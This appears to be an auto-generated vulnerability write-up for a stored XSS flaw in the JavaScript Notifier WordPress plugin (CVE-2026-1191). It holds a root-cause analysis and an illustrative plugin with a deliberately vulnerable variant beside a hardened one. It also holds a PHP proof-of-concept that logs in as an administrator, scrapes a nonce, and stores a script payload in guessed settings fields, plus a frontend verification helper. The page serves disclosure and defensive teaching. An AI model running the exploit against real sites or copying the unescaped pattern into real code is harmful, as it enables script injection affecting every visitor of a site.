Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-1191: JavaScript Notifier <= 1.2.8 – Authenticated (Administrator+) Stored Cross-Site Scripting via Plugin Settings (javascript-notifier)

CVE ID CVE-2026-1191
Severity Medium (CVSS 4.4)
CWE 79
Vulnerable Version 1.2.8
Patched Version
Disclosed January 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1191 (metadata-based): this is an authenticated stored cross-site scripting (XSS) flaw in the JavaScript Notifier WordPress plugin (slug `javascript-notifier`), versions 1.2.8 and earlier. The weakness is in the plugin’s settings: a user with administrator privileges can save a value containing script, and that value is later rendered into the site’s pages, typically in the footer via the `wp_footer` action, where it executes in the browser of every visitor.

The root cause is insufficient input sanitization and output escaping on user-supplied attributes. The CWE-79 classification indicates the plugin fails to neutralize user input before placing it into web page output. Atomic Edge research infers that the plugin accepts settings via an admin form, stores them without adequate sanitization, and later prints them in its `wp_footer` callback without escaping functions such as `esc_attr()` or `esc_html()`. This conclusion rests on the vulnerability description and common WordPress plugin patterns; no source code diff is available to confirm it.

Exploitation requires administrator-level access. The attacker navigates to the plugin’s settings page in the WordPress admin area, typically `/wp-admin/options-general.php?page=javascript-notifier` or a similar menu entry, and submits a crafted value in one of the plugin’s setting fields. A realistic payload is `<script>alert(document.domain)</script>` (the marker used in the PoC below) or a script tag loading external JavaScript. On save, the input is stored in the WordPress database, and the payload executes for every visitor once the plugin renders its output via `wp_footer`. One caveat a tester should keep in mind: on a single-site install, administrators hold the `unfiltered_html` capability and can already publish raw script, so findings of this class matter chiefly on multisite, where administrators lack that capability, and on sites that have removed it with `DISALLOW_UNFILTERED_HTML`; that precondition is consistent with the high attack complexity (AC:H) in the CVSS vector.

Remediation requires input validation on save and context-appropriate escaping on output. The patched version (1.2.9) likely applies WordPress sanitization functions such as `sanitize_text_field()` when settings are saved, ideally through `register_setting()` with a `sanitize_callback`, so that values never reach the database unsanitized. On output, the `wp_footer` callback should escape for the exact sink: `esc_attr()` inside HTML attributes, `esc_html()` for text content, `esc_url()` for URLs, and `wp_kses_post()` where a limited HTML subset is intended. Sanitization on input and escaping on output are complementary, not alternatives: stripping tags on save does not protect values written by older versions or by other code paths, and escaping at the sink is what guarantees user-controlled data is emitted as inert text rather than executable code.
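To make the inferred root cause and the remediation concrete, here is an added illustration written for this page. It is not code from the javascript-notifier plugin (whose source is not available here): it shows a hypothetical settings page that stores an option unsanitized and echoes it raw in `wp_footer`, beside a hardened variant that registers the option through the Settings API with a sanitize callback and escapes for each output sink. It goes slightly beyond the text by adding a second, allowlisted field (a colour) to show validation that is stricter than tag stripping. Every `ae_demo_` name, option, field and the `AE_DEMO_HARDENED` switch are assumptions.

```php
<?php
/**
 * Added illustration of the inferred CWE-79 pattern. This is NOT the
 * javascript-notifier plugin's code; every ae_demo_* function, option and
 * form field is hypothetical. Set AE_DEMO_HARDENED to true to load the fixed
 * variant instead of the vulnerable one.
 */
if ( ! defined( 'AE_DEMO_HARDENED' ) ) {
    define( 'AE_DEMO_HARDENED', false );
}

/* ---------- Vulnerable pattern: store raw, echo raw ---------- */

function ae_demo_vuln_settings_page() {
    // Self-handled form posting back to this page; the stored value is echoed unescaped here too.
    ?>
    <form method="post">
        <?php wp_nonce_field( 'ae_demo_save' ); ?>
        <input type="text" name="ae_demo_text" value="<?php echo get_option( 'ae_demo_text', '' ); ?>">
        <?php submit_button(); ?>
    </form>
    <?php
}

function ae_demo_vuln_save() {
    // Nonce and capability checks are present: this is not CSRF, it is an administrator
    // storing script. The value reaches the options table exactly as posted.
    if ( isset( $_POST['ae_demo_text'] ) && current_user_can( 'manage_options' ) ) {
        check_admin_referer( 'ae_demo_save' );
        update_option( 'ae_demo_text', wp_unslash( $_POST['ae_demo_text'] ) );
    }
}

function ae_demo_vuln_footer() {
    // Concatenated into HTML with no escaping: a stored <script> runs for every visitor.
    echo '<div id="ae-demo-notice">' . get_option( 'ae_demo_text', '' ) . '</div>';
}

/* ---------- Hardened pattern: allowlist on input, escape on output ---------- */

function ae_demo_register_settings() {
    // The Settings API runs sanitize_callback before the value is written.
    register_setting( 'ae_demo', 'ae_demo_text', array(
        'sanitize_callback' => 'sanitize_text_field', // strips tags and control characters
        'default'           => '',
    ) );
    register_setting( 'ae_demo', 'ae_demo_color', array(
        'sanitize_callback' => 'ae_demo_sanitize_color', // strict allowlist, not just escaping
        'default'           => '#333333',
    ) );
}

function ae_demo_sanitize_color( $value ) {
    // Anything that is not a 6-digit hex colour falls back to the default.
    return preg_match( '/^#[0-9a-fA-F]{6}$/', (string) $value ) ? $value : '#333333';
}

function ae_demo_hardened_settings_page() {
    // settings_fields() emits option_page, action=update, _wpnonce and _wp_http_referer;
    // the form posts to options.php, which applies the registered sanitize callbacks.
    ?>
    <form method="post" action="options.php">
        <?php settings_fields( 'ae_demo' ); ?>
        <input type="text" name="ae_demo_text"
               value="<?php echo esc_attr( get_option( 'ae_demo_text', '' ) ); ?>">
        <input type="text" name="ae_demo_color"
               value="<?php echo esc_attr( get_option( 'ae_demo_color', '#333333' ) ); ?>">
        <?php submit_button(); ?>
    </form>
    <?php
}

function ae_demo_hardened_footer() {
    $text  = get_option( 'ae_demo_text', '' );
    $color = get_option( 'ae_demo_color', '#333333' );
    // Escape for the exact sink: esc_attr() inside attributes, esc_html() for text nodes.
    // Anything front-end JavaScript needs travels in a data attribute, so no
    // user-controlled string is ever concatenated into an inline <script>.
    printf(
        '<div id="ae-demo-notice" style="color:%s" data-msg="%s">%s</div>',
        esc_attr( $color ),
        esc_attr( $text ),
        esc_html( $text )
    );
}

if ( AE_DEMO_HARDENED ) {
    add_action( 'admin_init', 'ae_demo_register_settings' );
    add_action( 'wp_footer', 'ae_demo_hardened_footer' );
    $ae_demo_page = 'ae_demo_hardened_settings_page';
} else {
    add_action( 'admin_init', 'ae_demo_vuln_save' );
    add_action( 'wp_footer', 'ae_demo_vuln_footer' );
    $ae_demo_page = 'ae_demo_vuln_settings_page';
}
add_action( 'admin_menu', function () use ( $ae_demo_page ) {
    add_options_page( 'AE Demo Notifier', 'AE Demo Notifier', 'manage_options', 'ae-demo', $ae_demo_page );
} );
```

Dropped into a test site's `wp-content/plugins/` directory and activated, the vulnerable variant renders a saved `<script>` marker raw in the footer, while the hardened variant strips it on save and escapes whatever remains on output. The hardened form also shows why a PoC that posts to the plugin page itself can miss: a Settings API form posts to `options.php` with `option_page` and `action=update`.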

The impact of successful exploitation is client-side code execution in the browser of any site visitor, including logged-in users and other administrators. Because WordPress sets its authentication cookies HttpOnly, reading them through `document.cookie` is generally not possible; the realistic impact is riding the victim’s authenticated session to perform actions in their name, defacing the site, or redirecting visitors to malicious domains. The CVSS score of 4.4 reflects the high privileges required (PR:H) and high attack complexity (AC:H); the scope change (S:C) raises the score because the injected script runs in visitors’ browsers rather than in the vulnerable component itself, while the low confidentiality and integrity impacts (C:L/I:L) and no availability impact keep it at Medium. The stored nature of the XSS increases its reach compared to reflected attacks: no victim has to open a crafted link.

Differential between vulnerable and patched code

No source code diff is available for this CVE; the analysis above and the proof of concept below are inferred from the advisory metadata.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1191 - JavaScript Notifier <= 1.2.8 - Authenticated (Administrator+) Stored Cross-Site Scripting via Plugin Settings

// CONFIGURATION
$target_url = 'https://target-site.com'; // Target WordPress site URL, without a trailing slash
$admin_user = 'administrator';           // Administrator username
$admin_pass = 'password';                // Administrator password
$payload    = '<script>alert(document.domain)</script>'; // XSS marker to store in the plugin settings

// ASSUMPTIONS: The plugin settings are saved via a standard WordPress admin POST request.
// The exact form field names are unknown but are inferred to be related to notification text or attributes.
// This PoC attempts to find and poison a likely text field. If the settings page is built on the
// Settings API, the form posts to /wp-admin/options.php with option_page and action=update instead
// of posting back to the page; the presence of an option_page field is used to detect that layout.

function poc_cve_2026_1191($target_url, $admin_user, $admin_pass, $payload) {
    $cookie_jar = tempnam(sys_get_temp_dir(), 'wpxss'); // per-run cookie jar
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_jar);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_jar);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); // For testing only

    // 0. Fetch the login page first: wp-login.php sets wordpress_test_cookie, and a POST that
    //    carries testcookie=1 without that cookie is rejected with a "cookies are blocked" error.
    $login_url = $target_url . '/wp-login.php';
    curl_setopt($ch, CURLOPT_URL, $login_url);
    curl_setopt($ch, CURLOPT_HTTPGET, true);
    curl_exec($ch);

    // 1. Authenticate to WordPress admin
    $login_fields = http_build_query([
        'log'         => $admin_user,
        'pwd'         => $admin_pass,
        'wp-submit'   => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie'  => '1',
    ]);
    curl_setopt($ch, CURLOPT_URL, $login_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $login_fields);
    curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/x-www-form-urlencoded']);
    $response  = curl_exec($ch);
    $final_url = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL);
    // A failed login lands back on wp-login.php with a login_error block; a successful one is
    // redirected to /wp-admin/. Searching the body for "wp-admin" alone is not enough, because
    // the login page itself links to /wp-admin/ assets.
    if (strpos($final_url, 'wp-login.php') !== false || strpos($response, 'login_error') !== false) {
        echo "[-] Authentication failed.\n";
        curl_close($ch);
        return false;
    }
    echo "[+] Authenticated as administrator.\n";

    // 2. Access the plugin's settings page to obtain a nonce.
    // The plugin slug is 'javascript-notifier'. Settings are likely under Settings -> JavaScript Notifier.
    $settings_url = $target_url . '/wp-admin/options-general.php?page=javascript-notifier';
    curl_setopt($ch, CURLOPT_URL, $settings_url);
    curl_setopt($ch, CURLOPT_HTTPGET, true);
    $response = curl_exec($ch);

    // 3. Extract a nonce from the form. Assume a field named '_wpnonce' or similar.
    //    WordPress nonces are 10 lowercase hex characters.
    $nonce = '';
    if (preg_match('/name="_wpnonce" value="([a-f0-9]+)"/', $response, $matches)) {
        $nonce = $matches[1];
    } elseif (preg_match('/name="javascript_notifier_nonce" value="([a-f0-9]+)"/', $response, $matches)) {
        $nonce = $matches[1];
    } else {
        // Fallback: try to infer from common patterns.
        preg_match_all('/value="([a-f0-9]{10,})"/', $response, $matches);
        if (!empty($matches[1])) $nonce = $matches[1][0];
    }
    if (empty($nonce)) {
        echo "[-] Could not extract security nonce. The form structure may differ.\n";
        curl_close($ch);
        return false;
    }
    echo "[+] Extracted nonce: $nonce\n";

    // 4. Submit the XSS payload to the settings form.
    // The exact parameter names are unknown. We attempt common field names based on plugin purpose.
    $submit_url  = $settings_url;
    $post_fields = [
        '_wpnonce'         => $nonce,
        '_wp_http_referer' => '/wp-admin/options-general.php?page=javascript-notifier',
        'submit'           => 'Save Changes',
        // Attempt to inject into likely text fields
        'javascript_notifier_text' => $payload,
        'js_notifier_message'      => $payload,
        'notification_text'        => $payload,
        'message'                  => $payload,
    ];
    if (preg_match('/name="option_page" value="([^"]+)"/', $response, $m)) {
        // Settings API layout: options.php validates the nonce against option_page and
        // runs the registered sanitize callbacks before saving.
        $submit_url                 = $target_url . '/wp-admin/options.php';
        $post_fields['option_page'] = $m[1];
        $post_fields['action']      = 'update';
    }
    curl_setopt($ch, CURLOPT_URL, $submit_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
    $response  = curl_exec($ch);
    $final_url = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL);

    // 5. Verify the save. options.php redirects back with settings-updated=true; self-handled
    //    forms usually print a "Settings saved" or "updated" notice. A saved value only shows
    //    the form accepted the input: a patched plugin saves it too, sanitized. Whether it is
    //    rendered unescaped has to be confirmed on the frontend.
    if (strpos($final_url, 'settings-updated=true') !== false
        || strpos($response, 'Settings saved') !== false
        || strpos($response, 'updated') !== false
        || strpos($response, 'success') !== false) {
        echo "[+] XSS payload likely injected successfully.\n";
        echo "[+] Visit the site's frontend to trigger the payload in the footer.\n";
    } else {
        echo "[-] Payload injection may have failed. The actual form field names need verification.\n";
    }
    curl_close($ch);
    @unlink($cookie_jar);
    return true;
}

// Execute the PoC
poc_cve_2026_1191($target_url, $admin_user, $admin_pass, $payload);
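Step 5 of the PoC only establishes that the settings form accepted the value; the vulnerability is decided on the frontend. A vulnerable build echoes the marker raw, a build that escapes on output prints it as `&lt;script&gt;...`, and a build that runs `sanitize_text_field()` on save stores nothing of it, because `wp_strip_all_tags()` removes script tags together with their contents. The classifier below is an added verification helper, not part of the Atomic Edge PoC; the three footer fragments are constructed samples, and the optional live mode fetches the front page unauthenticated with no plugin-specific assumptions.

```php
<?php
/**
 * Added verification helper (not part of the Atomic Edge PoC). Classifies how a
 * stored marker appears in rendered HTML: 'raw' (executes: vulnerable),
 * 'escaped' (neutralized on output) or 'absent' (stripped on input, or never saved).
 */
function ae_classify_marker( $html, $payload ) {
    if ( strpos( $html, $payload ) !== false ) {
        return 'raw';
    }
    // esc_html() produces the same entities as htmlspecialchars() for this marker.
    if ( strpos( $html, htmlspecialchars( $payload, ENT_QUOTES, 'UTF-8' ) ) !== false ) {
        return 'escaped';
    }
    return 'absent';
}

function ae_fetch_frontend( $url ) {
    // Unauthenticated GET: the footer is rendered for anonymous visitors as well.
    $ch = curl_init( $url );
    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
    curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
    curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, false ); // testing only, as in the PoC
    $body = curl_exec( $ch );
    curl_close( $ch );
    return $body === false ? '' : $body;
}

$payload = '<script>alert(document.domain)</script>'; // same marker the PoC stores

if ( isset( $argv[1] ) ) {
    // Usage: php verify.php https://target-site.com/
    echo ae_classify_marker( ae_fetch_frontend( $argv[1] ), $payload ), "\n";
    exit;
}

// Constructed sample footers (not captured from a real site), one per outcome.
$samples = array(
    'vulnerable' => '<footer><div id="notice"><script>alert(document.domain)</script></div></footer>',
    'escaped'    => '<footer><div id="notice">&lt;script&gt;alert(document.domain)&lt;/script&gt;</div></footer>',
    'stripped'   => '<footer><div id="notice"></div></footer>',
);
foreach ( $samples as $label => $html ) {
    // prints: vulnerable -> raw, escaped -> escaped, stripped -> absent
    printf( "%-10s -> %s\n", $label, ae_classify_marker( $html, $payload ) );
}
```

Only `raw` confirms the stored XSS; `escaped` or `absent` after a successful save means the output path or the save path already neutralizes the input, which is what the fix described under Remediation is expected to produce.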
